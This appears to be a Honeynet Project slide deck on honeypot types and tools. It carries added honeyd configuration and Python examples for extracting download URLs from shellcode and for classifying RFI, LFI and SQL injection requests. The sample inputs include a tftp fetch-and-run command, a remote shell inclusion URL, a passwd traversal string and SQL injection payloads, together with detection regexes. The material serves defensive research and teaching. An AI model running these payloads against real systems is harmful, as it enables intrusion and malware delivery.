Use Honeypots To Know Your Enemies
Adel Karimi, The Honeynet Project
Nov 14, 2010
Speaker
Adel Karimi
Member of The Honeynet Project (Iranian Chapter Lead)
Editor-in-chief of Snoop Security Ezine
M.S. Student @ Tehran Polytechnic
…
Agenda
• About The Honeynet Project
• Introduction to Honeypot
• High-Interaction Honeypots
• Low-Interaction Honeypots
• Client Honeypots
The Honeynet Project
• Founded in 1999, The Honeynet Project is an
international, non-profit research organization
dedicated to improving the security of the Internet at
no cost to the public.
• We accomplish this goal in the following three ways:
– Awareness - We raise awareness of the threats and
vulnerabilities that exist in the Internet today
– Information - For those who are already aware and
concerned, we provide details to better secure and defend
your resources
– Tools
~ 40 International Chapters
Iranian Honeynet Chapter
Honeynet Project Challenges
• Learn about threats, analyze attacks, and share findings.
//honeynet.org/challenges
• Past Challenges:
– Challenge 6 - Analyzing Malicious Portable Destructive Files
– Challenge 5 - Log Mysteries
– Challenge 4 - VoIP
– Challenge 3 - banking troubles
– Challenge 2 - browsers under attack
– Challenge 1 - pcap attack trace
Honeypots
• Definition: A honeypot is a security
resource whose value lies in being probed,
attacked, or compromised.
- Lance Spitzner
• Has no production value; anything going to or from a honeypot is therefore likely a probe, attack or compromise
Honeypots
• Uses of honeypots
– Slowing down and following incoming attackers
– Catching and analyzing 0-days, malware, botnets, and so on
– Improving intrusion detection systems
• SurfIDS
• Nebula (An Intrusion Signature Generator)
“To learn the tools, tactics and motives involved in computer and network attacks.”
SurfIDS
Features:
• Distributed sensors
• Central honeypot deployment
• Central logging
Honeypots
• Honeypot vs. IDS
• Honeynet:
– A network of [High-Interaction] honeypots
– Main requirements:
• Data Control
• Data Capture
• Data Analysis
• Data Collection
Types of Honeypots
• Production vs. Research honeypots:
– Production honeypots protect an organization,
while research honeypots are used to learn.
• Different Types:
– High-Interaction
• Real environment
– Low-Interaction
• Simulated resource(s)
• Physical vs. Virtual !?
High-Interaction Honeypots
• Honeywall: for capturing, controlling and analyzing attacks
– It creates an architecture that allows you to deploy both LI and HI honeypots, but is designed primarily for HI.
– Layer 2 bridging device (based on CentOS 5)
– Tools:
• IPtables
• Snort_inline
• Snort
• Hflow
• P0f
• Argus
• Sebek
• Walleye
Honeywall: Walleye web interface (screenshot)
High-Interaction Honeypots
• SEBEK
– For “data capture”
– Hidden kernel module on the honeypot that records the attacker's activity (e.g. keystrokes) and exports it covertly over the network
High-Interaction Honeypots
• Qebek (QEMU Sebek)
– A QEMU-based HI honeypot monitoring tool which aims at improving the invisibility of monitoring the attackers’ activities in HI honeypots.
– Two techniques: virtual machine introspection (VMI) and system view reconstruction (SVR).
– VMI enables the IDS or other security system to monitor system events from outside the virtual machine, while SVR allows the monitoring system to reconstruct meaningful high-level OS information from the raw hardware-level information generated by VMI.
• Read the recently published KYT paper, “Qebek - Conceal the Monitoring”. The paper is available from http://honeynet.org/papers/KYT_qebek
Low-Interaction Honeypots
• Honeyd
– Written by Niels Provos in 2002.
– Available at www.honeyd.org
Features:
• Simulates thousands of virtual hosts at the same time
• Configuration of arbitrary services via simple configuration file
• Simulates operating systems at TCP/IP stack level
• Tarpit
• Dynamic templates
• Subsystem virtualization:
– Run real UNIX applications under virtual Honeyd IP addresses
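The features listed above, put together in one honeyd.conf fragment. This is an example added here, not configuration from the slides or from the Honeyd distribution; the 192.168.1.0/24 addresses, the script paths under scripts/ and the sshd subsystem command line are assumptions and must be adjusted to your own lab.

```text
# Example honeyd.conf (added example; addresses and script paths are assumptions)

# Catch-all template for addresses nobody else claims
create default
set default default tcp action block
set default default udp action block
set default default icmp action block

# "Windows" host: stack-level OS personality, SMB ports open, HTTP answered by a script
create windows
set windows personality "Microsoft Windows XP Professional SP1"
set windows default tcp action reset
set windows uptime 1728000
add windows tcp port 135 open
add windows tcp port 139 open
add windows tcp port 445 open
add windows tcp port 80 "sh scripts/web.sh"
bind 192.168.1.201 windows

# "Linux" host: SMTP as a tarpit (holds connections open to slow mass-mailers),
# plus a real daemon run as a subsystem under the virtual IP
create linux
set linux personality "Linux 2.4.20"
set linux default tcp action reset
add linux tcp port 25 tarpit "sh scripts/smtp.sh"
add linux subsystem "/usr/sbin/sshd -D"
bind 192.168.1.202 linux

# Dynamic template: pick the personality from the attacker's OS as seen by p0f
dynamic chameleon
add chameleon use windows if source os = "windows"
add chameleon use linux if source os = "linux"
add chameleon otherwise use default
bind 192.168.1.203 chameleon
```

Honeyd only answers for addresses that reach it, so run arpd for the unused range first (for example `arpd 192.168.1.0/24`) and then `honeyd -d -f honeyd.conf -i eth0 192.168.1.0/24`; without arpd the virtual hosts never see any packets.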
Low-Interaction Honeypots
• Nepenthes
– Nepenthes is a versatile tool to collect malware. It acts passively by emulating known vulnerabilities and downloading malware trying to exploit these vulnerabilities. (Excerpt from the Nepenthes website)
– Nepenthes is outdated
• Do not use Nepenthes, use Dionaea instead.
• Read why: http://carnivore.it/2009/10/27/introducting_dionaea
• PHARM is a client/server tool to manage, report and analyze all your distributed Nepenthes instances from one interface.
Low-Interaction Honeypots
• Mwcollect
– mwcollectd is a versatile malware collection daemon, uniting the best features of nepenthes and honeytrap.
Low-Interaction Honeypots
• Dionaea
– Nepenthes successor
– Dionaea's intention is to trap malware exploiting vulnerabilities exposed by services offered to a network.
• Features:
– Static state machines to emulate vulnerable services
– Pattern matching to extract values from shellcode
– Download copies of the attacking worm
– Store on disk, or submit to a sandbox
Dionaea
• Features:
– Implements the required parts of the SMB protocol
– Uses libemu (beyond pattern matching: the shellcode is actually emulated)
– Fewer services, better emulation and better logging
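The “pattern matching to extract values from shellcode” stage that Nepenthes, Amun and the non-libemu path of Dionaea rely on, as an added example (this is not code from any of those projects). A handler recognises a known decoder stub, reads the XOR key and payload length out of the stub bytes, decodes the payload and then looks for the download instruction (a URL, or the classic `tftp -i <host> GET <file>` command line) that tells the honeypot where to fetch the malware from. The stub byte layout, the samples and the TEST-NET addresses are all constructed for this example; a real collector carries many such stub signatures, which is exactly the brittleness libemu removes.

```python
import re

# Constructed single-byte XOR decoder stub in the jmp/call/pop style:
#   jmp short +0x0b ; pop esi ; xor ecx,ecx ; mov cl,LEN ; xor byte [esi],KEY ;
#   inc esi ; loop ; call back to pop ; <LEN encoded payload bytes>
# The byte layout is made up for this example and is NOT a nepenthes/dionaea
# signature; it only stands in for the kind of pattern such handlers match.
STUB_PREFIX = b"\xeb\x0b\x5e\x31\xc9\xb1"
STUB_MIDDLE = b"\x80\x36"
STUB_SUFFIX = b"\x46\xe2\xfa\xe8\xf0\xff\xff\xff"
DECODER_STUB = re.compile(
    re.escape(STUB_PREFIX) + rb"(?P<length>.)" + re.escape(STUB_MIDDLE)
    + rb"(?P<key>.)" + re.escape(STUB_SUFFIX),
    re.DOTALL,
)

# Download indicators searched for in (decoded) payloads: plain URLs, and the
# "tftp -i <host> GET <file>" command line that Windows worms commonly use.
URL_RE = re.compile(rb"(?:https?|ftp|tftp)://[\w.\-:/%~?=&]+")
TFTP_RE = re.compile(
    rb"tftp(?:\.exe)?\s+-i\s+(?P<host>[\w.\-]+)\s+get\s+(?P<file>[^\s&|;\x00]+)",
    re.IGNORECASE,
)


def build_sample_shellcode(command: bytes, key: int) -> bytes:
    """Constructed test input: wrap `command` in the toy stub, XOR-encoded with `key`."""
    if not 0 < len(command) < 256:
        raise ValueError("the toy stub uses an 8-bit length counter")
    encoded = bytes(b ^ key for b in command)
    return (STUB_PREFIX + bytes([len(command)]) + STUB_MIDDLE + bytes([key])
            + STUB_SUFFIX + encoded)


def find_download_targets(blob: bytes) -> list:
    """Return download targets found in a plaintext blob, normalised to URL form."""
    targets = [m.group(0).decode("ascii", "replace") for m in URL_RE.finditer(blob)]
    for m in TFTP_RE.finditer(blob):
        host = m.group("host").decode("ascii", "replace")
        name = m.group("file").decode("ascii", "replace")
        targets.append("tftp://%s/%s" % (host, name))
    return targets


def extract_download_urls(shellcode: bytes) -> list:
    """Scan the raw bytes first (unencoded payloads), then every payload that a
    recognised decoder stub reveals, decoded with the key/length read from the stub."""
    found = find_download_targets(shellcode)
    for m in DECODER_STUB.finditer(shellcode):
        length = m.group("length")[0]
        key = m.group("key")[0]
        payload = shellcode[m.end(): m.end() + length]
        found.extend(find_download_targets(bytes(b ^ key for b in payload)))
    unique = []
    for t in found:  # de-duplicate, keeping first-seen order
        if t not in unique:
            unique.append(t)
    return unique


if __name__ == "__main__":
    # Constructed samples with TEST-NET (192.0.2.0/24) addresses; no real malware involved.
    samples = [
        build_sample_shellcode(
            b"cmd /c tftp -i 192.0.2.10 GET update.exe update.exe & update.exe", 0x5A),
        build_sample_shellcode(b"url http://192.0.2.77:8080/bot.exe", 0x37),
        b"\x90" * 8 + b"tftp -i 192.0.2.5 get a.exe\x00",
    ]
    for s in samples:
        print(extract_download_urls(s))
```

The extracted target is what the collector then downloads (into a sandbox or a quarantined directory, never executed in place); the same pattern matching is also where false negatives come from, because a stub that differs by one byte from the signature is silently missed.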
Low-Interaction Honeypots
• Amun - A Python Honeypot
– Basically a Nepenthes port to Python
Amun
• A sample of collected attack data from Amun (screenshot)
Amun
DEMO
Using Metasploit to launch an attack against Amun (MS08-067)
Source: http://amunhoney.sourceforge.net
Low-Interaction Honeypots
• A new approach..
• Glastopf - A dynamic, LI web-app honeypot
– A minimalistic web server written in Python
– Collects information about web application-based attacks like RFI, SQL injection, and LFI
– Glastopf scans the incoming request for strings like “=http://” or “=ftp://”, tries to download and analyze the referenced file, and responds as closely as possible to the attacker's expectations
– The attacker sends us, for example, a bot, shell or spreader
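The request inspection just described, written out as an added example (not Glastopf's own code): parse the query string and POST body, flag a parameter whose value is a remote URL as an RFI attempt (the “=http://” / “=ftp://” case), and also recognise the traversal and SQL injection markers the slide lists. The RFI target URLs are what the honeypot would then fetch into a sandbox; this example only extracts them and does no network access. The sample requests and the TEST-NET addresses are constructed; the regexes are deliberately narrow and are starting points, not a complete signature set.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Remote file inclusion: a parameter whose value is a URL the vulnerable app would include().
RFI_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Local file inclusion / traversal markers. parse_qsl percent-decodes values, so %00 is \x00 here.
LFI_RE = re.compile(
    r"(?:\.\./|\.\.\\|/etc/passwd|/proc/self/environ|php://(?:filter|input)|\x00)",
    re.IGNORECASE,
)
# A few high-confidence SQL injection tokens; widen or tighten for your own false-positive budget.
SQLI_RE = re.compile(
    r"(?:'\s*or\s+['\d]|union\s+(?:all\s+)?select|sleep\(\d+\)|benchmark\(|--\s*$)",
    re.IGNORECASE,
)


def classify_request(request_line: str, body: str = "") -> list:
    """Classify one HTTP request given its request line (and form body for POST).
    Returns [(kind, parameter, decoded_value), ...] with kind in {'rfi', 'lfi', 'sqli'};
    an empty list means nothing was recognised."""
    method, target, _version = request_line.split(" ", 2)
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        params += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in params:
        if RFI_RE.match(value):
            findings.append(("rfi", name, value))
        elif LFI_RE.search(value):
            findings.append(("lfi", name, value))
        elif SQLI_RE.search(value):
            findings.append(("sqli", name, value))
    return findings


def rfi_urls(findings: list) -> list:
    """The remote files an RFI attempt asks the server to include. A honeypot fetches
    these into a sandbox (never executes them) to collect the bot, shell or spreader."""
    return [value for kind, _name, value in findings if kind == "rfi"]


if __name__ == "__main__":
    # Constructed requests using TEST-NET addresses; none of these are real captures.
    samples = [
        ("GET /index.php?page=http://192.0.2.9/shells/c99.txt?? HTTP/1.1", ""),
        ("GET /view.php?file=../../../../etc/passwd%00 HTTP/1.1", ""),
        ("GET /products.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1", ""),
        ("POST /login.php HTTP/1.1", "user=admin&pass=x%27+or+%271%27%3D%271"),
        ("GET /index.php?page=home HTTP/1.1", ""),
    ]
    for line, body in samples:
        found = classify_request(line, body)
        print(line.split(" ")[1], "->", found or "benign", "| fetch:", rfi_urls(found))
```

Two practical notes: parse_qsl splits on `&`, so an RFI URL that itself carries a query string with `&` is truncated at the first one (log the raw request line as well, not only the decoded parameters), and the trailing `??` on the c99 sample is typical of real RFI probes because it turns whatever the vulnerable script appends into part of the URL's query.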
Client Honeypots
• What is a HoneyClient!?
• Drive-by Download Attacks
Source: http://www.honeynet.org/papers/mw
Source: Canadian Honeynet Project
Other Types of Honeypots
• WiFi Honeypot
• VoIP Honeypot
– VoIP Honey
– Artemisa
• SSH Honeypot
– Kippo
– Kojoney
• …
Conclusion
• You can use Honeypots to know your
enemies..!
– Collecting Malware
– Tracking Botnets
– …
Virtual Honeypots: From Botnet
Tracking to Intrusion Detection
By Niels Provos, Thorsten Holz
Use Honeypots to Know Your Enemies
By Adel Karimi, Iranian Honeynet Chapter, adel.net at Gmail.com
Thank You..
?